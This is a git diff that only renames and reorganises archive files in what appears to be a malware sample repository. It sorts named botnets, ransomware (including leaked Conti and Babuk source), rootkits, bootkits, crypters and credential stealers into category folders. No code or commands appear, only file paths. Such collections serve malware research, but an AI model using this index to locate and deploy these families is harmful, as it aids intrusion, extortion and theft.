diff --git a/Win32/Win32.UnkBot.7z b/Win32/Botnets/Win32.UnkBot.7z
similarity index 100%
rename from Win32/Win32.UnkBot.7z
rename to Win32/Botnets/Win32.UnkBot.7z
diff --git a/Win32/Win32.VIrc.rar b/Win32/Botnets/Win32.VIrc.rar
similarity index 100%
rename from Win32/Win32.VIrc.rar
rename to Win32/Botnets/Win32.VIrc.rar
diff --git a/Win32/Win32.VbBot.zip b/Win32/Botnets/Win32.VbBot.zip
similarity index 100%
rename from Win32/Win32.VbBot.zip
rename to Win32/Botnets/Win32.VbBot.zip
diff --git a/Win32/Win32.Volk.7z b/Win32/Botnets/Win32.Volk.7z
similarity index 100%
rename from Win32/Win32.Volk.7z
rename to Win32/Botnets/Win32.Volk.7z
diff --git a/Win32/Win32.WBot.7z b/Win32/Botnets/Win32.WBot.7z
similarity index 100%
rename from Win32/Win32.WBot.7z
rename to Win32/Botnets/Win32.WBot.7z
diff --git a/Win32/Win32.Wiseg3ck0.7z b/Win32/Botnets/Win32.Wiseg3ck0.7z
similarity index 100%
rename from Win32/Win32.Wiseg3ck0.7z
rename to Win32/Botnets/Win32.Wiseg3ck0.7z
diff --git a/Win32/Win32.Woodworm.7z b/Win32/Botnets/Win32.Woodworm.7z
similarity index 100%
rename from Win32/Win32.Woodworm.7z
rename to Win32/Botnets/Win32.Woodworm.7z
diff --git a/Win32/Win32.WoopieBot.7z b/Win32/Botnets/Win32.WoopieBot.7z
similarity index 100%
rename from Win32/Win32.WoopieBot.7z
rename to Win32/Botnets/Win32.WoopieBot.7z
diff --git a/Win32/Win32.XBot.7z b/Win32/Botnets/Win32.XBot.7z
similarity index 100%
rename from Win32/Win32.XBot.7z
rename to Win32/Botnets/Win32.XBot.7z
diff --git a/Win32/Win32.XFireSpread.7z b/Win32/Botnets/Win32.XFireSpread.7z
similarity index 100%
rename from Win32/Win32.XFireSpread.7z
rename to Win32/Botnets/Win32.XFireSpread.7z
diff --git a/Win32/Win32.Xinch.rar b/Win32/Botnets/Win32.Xinch.rar
similarity index 100%
rename from Win32/Win32.Xinch.rar
rename to Win32/Botnets/Win32.Xinch.rar
diff --git a/Win32/Win32.Xtcp.ba.7z b/Win32/Botnets/Win32.Xtcp.ba.7z
similarity index 100%
rename from Win32/Win32.Xtcp.ba.7z
rename to Win32/Botnets/Win32.Xtcp.ba.7z
diff --git a/Win32/Win32.Ya.7z b/Win32/Botnets/Win32.Ya.7z
similarity index 100%
rename from Win32/Win32.Ya.7z
rename to Win32/Botnets/Win32.Ya.7z
diff --git a/Win32/Win32.Zemra.7z b/Win32/Botnets/Win32.Zemra.7z
similarity index 100%
rename from Win32/Win32.Zemra.7z
rename to Win32/Botnets/Win32.Zemra.7z
diff --git a/Win32/Win32.Zero.7z b/Win32/Botnets/Win32.Zero.7z
similarity index 100%
rename from Win32/Win32.Zero.7z
rename to Win32/Botnets/Win32.Zero.7z
diff --git a/Win32/Win32.h3xb0t.rar b/Win32/Botnets/Win32.h3xb0t.rar
similarity index 100%
rename from Win32/Win32.h3xb0t.rar
rename to Win32/Botnets/Win32.h3xb0t.rar
diff --git a/Win32/Win32.x0rUsb.7z b/Win32/Botnets/Win32.x0rUsb.7z
similarity index 100%
rename from Win32/Win32.x0rUsb.7z
rename to Win32/Botnets/Win32.x0rUsb.7z
diff --git a/Win32/Win32.PureCrypt.rar b/Win32/Crypters/Win32.PureCrypt.rar
similarity index 100%
rename from Win32/Win32.PureCrypt.rar
rename to Win32/Crypters/Win32.PureCrypt.rar
diff --git a/Win32/Hoax.Win32.Ransomware.Petya.zip b/Win32/Ransomware/Hoax.Win32.Ransomware.Petya.zip
similarity index 100%
rename from Win32/Hoax.Win32.Ransomware.Petya.zip
rename to Win32/Ransomware/Hoax.Win32.Ransomware.Petya.zip
diff --git a/Leaks/Other/Ransomware.Multi.Babuk.c.rar b/Win32/Ransomware/Ransomware.Multi.Babuk.c.rar
similarity index 100%
rename from Leaks/Other/Ransomware.Multi.Babuk.c.rar
rename to Win32/Ransomware/Ransomware.Multi.Babuk.c.rar
diff --git a/Win32/Win32.BAT.GonnaCope.7z b/Win32/Ransomware/Win32.BAT.GonnaCope.7z
similarity index 100%
rename from Win32/Win32.BAT.GonnaCope.7z
rename to Win32/Ransomware/Win32.BAT.GonnaCope.7z
diff --git a/Leaks/Win32/Win32.Conti.c.7z b/Win32/Ransomware/Win32.Conti.c.7z
similarity index 100%
rename from Leaks/Win32/Win32.Conti.c.7z
rename to Win32/Ransomware/Win32.Conti.c.7z
diff --git a/Win32/Win32.RansomWar.rar b/Win32/Ransomware/Win32.RansomWar.rar
similarity index 100%
rename from Win32/Win32.RansomWar.rar
rename to Win32/Ransomware/Win32.RansomWar.rar
diff --git a/Leaks/Win32/Win32.Ransomware.Paradise.a.zip b/Win32/Ransomware/Win32.Ransomware.Paradise.a.zip
similarity index 100%
rename from Leaks/Win32/Win32.Ransomware.Paradise.a.zip
rename to Win32/Ransomware/Win32.Ransomware.Paradise.a.zip
diff --git a/Win32/Win32.Ransomware.SkynetLocker.7z b/Win32/Ransomware/Win32.Ransomware.SkynetLocker.7z
similarity index 100%
rename from Win32/Win32.Ransomware.SkynetLocker.7z
rename to Win32/Ransomware/Win32.Ransomware.SkynetLocker.7z
diff --git a/Leaks/Bootkit/Bootkit.Rovnix.7z b/Win32/Rootkits/Bootkit.Rovnix.7z
similarity index 100%
rename from Leaks/Bootkit/Bootkit.Rovnix.7z
rename to Win32/Rootkits/Bootkit.Rovnix.7z
diff --git a/Win32/Win32.Rootkit.Alpha.a.c.7z b/Win32/Rootkits/Win32.Rootkit.Alpha.a.c.7z
similarity index 100%
rename from Win32/Win32.Rootkit.Alpha.a.c.7z
rename to Win32/Rootkits/Win32.Rootkit.Alpha.a.c.7z
diff --git a/Win32/Win32.Rootkit.GpuWinJelly.a.zip b/Win32/Rootkits/Win32.Rootkit.GpuWinJelly.a.zip
similarity index 100%
rename from Win32/Win32.Rootkit.GpuWinJelly.a.zip
rename to Win32/Rootkits/Win32.Rootkit.GpuWinJelly.a.zip
diff --git a/Win32/Win32.Rootkit.He4.rar b/Win32/Rootkits/Win32.Rootkit.He4.rar
similarity index 100%
rename from Win32/Win32.Rootkit.He4.rar
rename to Win32/Rootkits/Win32.Rootkit.He4.rar
diff --git a/Win32/Win32.Rootkit.Ibmis.rar b/Win32/Rootkits/Win32.Rootkit.Ibmis.rar
similarity index 100%
rename from Win32/Win32.Rootkit.Ibmis.rar
rename to Win32/Rootkits/Win32.Rootkit.Ibmis.rar
diff --git a/Win32/Win32.Rootkit.SMMRootkit.rar b/Win32/Rootkits/Win32.Rootkit.SMMRootkit.rar
similarity index 100%
rename from Win32/Win32.Rootkit.SMMRootkit.rar
rename to Win32/Rootkits/Win32.Rootkit.SMMRootkit.rar
diff --git a/Win32/Win32.Rootkit.Sock.b.7z b/Win32/Rootkits/Win32.Rootkit.Sock.b.7z
similarity index 100%
rename from Win32/Win32.Rootkit.Sock.b.7z
rename to Win32/Rootkits/Win32.Rootkit.Sock.b.7z
diff --git a/Win32/Win32.Rootkit.Zion.a.rar b/Win32/Rootkits/Win32.Rootkit.Zion.a.rar
similarity index 100%
rename from Win32/Win32.Rootkit.Zion.a.rar
rename to Win32/Rootkits/Win32.Rootkit.Zion.a.rar
diff --git a/Leaks/Other/Trojan-Banker.Win32.Dexter.7z b/Win32/Trojan-Banker.Win32.Dexter.7z
similarity index 100%
rename from Leaks/Other/Trojan-Banker.Win32.Dexter.7z
rename to Win32/Trojan-Banker.Win32.Dexter.7z
diff --git a/Leaks/Other/Unknown.DarkRadiation.7z b/Win32/Unknown.DarkRadiation.7z
similarity index 100%
rename from Leaks/Other/Unknown.DarkRadiation.7z
rename to Win32/Unknown.DarkRadiation.7z
diff --git a/Leaks/Other/Unknown.EB0LA.7z b/Win32/Unknown.EB0LA.7z
similarity index 100%
rename from Leaks/Other/Unknown.EB0LA.7z
rename to Win32/Unknown.EB0LA.7z
diff --git a/Leaks/Win32/Win32.Annabelle.J.7z b/Win32/Win32.Annabelle.J.7z
similarity index 100%
rename from Leaks/Win32/Win32.Annabelle.J.7z
rename to Win32/Win32.Annabelle.J.7z
diff --git a/Leaks/Win32/Win32.BloodyStealer.rar b/Win32/Win32.BloodyStealer.rar
similarity index 100%
rename from Leaks/Win32/Win32.BloodyStealer.rar
rename to Win32/Win32.BloodyStealer.rar
diff --git a/Leaks/Win32/Win32.Borat.7z b/Win32/Win32.Borat.7z
similarity index 100%
rename from Leaks/Win32/Win32.Borat.7z
rename to Win32/Win32.Borat.7z
diff --git a/Leaks/Win32/Win32.Buhtrap.7z b/Win32/Win32.Buhtrap.7z
similarity index 100%
rename from Leaks/Win32/Win32.Buhtrap.7z
rename to Win32/Win32.Buhtrap.7z
diff --git a/Leaks/Win32/Win32.Exonet.a.rar b/Win32/Win32.Exonet.a.rar
similarity index 100%
rename from Leaks/Win32/Win32.Exonet.a.rar
rename to Win32/Win32.Exonet.a.rar
diff --git a/Leaks/Win32/Win32.Gozi.rar b/Win32/Win32.Gozi.rar
similarity index 100%
rename from Leaks/Win32/Win32.Gozi.rar
rename to Win32/Win32.Gozi.rar
diff --git a/Leaks/Win32/Win32.HiddenVNCBot.2021.zip b/Win32/Win32.HiddenVNCBot.2021.zip
similarity index 100%
rename from Leaks/Win32/Win32.HiddenVNCBot.2021.zip
rename to Win32/Win32.HiddenVNCBot.2021.zip
diff --git a/Leaks/Other/Win32.Module.AmadeyStartup.zip b/Win32/Win32.Module.AmadeyStartup.zip
similarity index 100%
rename from Leaks/Other/Win32.Module.AmadeyStartup.zip
rename to Win32/Win32.Module.AmadeyStartup.zip
diff --git a/Leaks/Win32/Win32.PryntStealer.7z b/Win32/Win32.PryntStealer.7z
similarity index 100%
rename from Leaks/Win32/Win32.PryntStealer.7z
rename to Win32/Win32.PryntStealer.7z
diff --git a/Leaks/Win32/Win32.Stealer.PredatorTheThief.zip b/Win32/Win32.Stealer.PredatorTheThief.zip
similarity index 100%
rename from Leaks/Win32/Win32.Stealer.PredatorTheThief.zip
rename to Win32/Win32.Stealer.PredatorTheThief.zip
diff --git a/Leaks/Win32/Win32.Stealer.SoranoStealer.zip b/Win32/Win32.Stealer.SoranoStealer.zip
similarity index 100%
rename from Leaks/Win32/Win32.Stealer.SoranoStealer.zip
rename to Win32/Win32.Stealer.SoranoStealer.zip
diff --git a/Leaks/Win32/Win32.Zeus.a.b.7z b/Win32/Win32.Zeus.a.b.7z
similarity index 100%
rename from Leaks/Win32/Win32.Zeus.a.b.7z
rename to Win32/Win32.Zeus.a.b.7z
diff --git a/Leaks/Win32/Win32.Zeus.b.7z b/Win32/Win32.Zeus.b.7z
similarity index 100%
rename from Leaks/Win32/Win32.Zeus.b.7z
rename to Win32/Win32.Zeus.b.7z
diff --git a/Leaks/Win32/Win32.m0yv.7z b/Win32/Win32.m0yv.7z
similarity index 100%
rename from Leaks/Win32/Win32.m0yv.7z
rename to Win32/Win32.m0yv.7z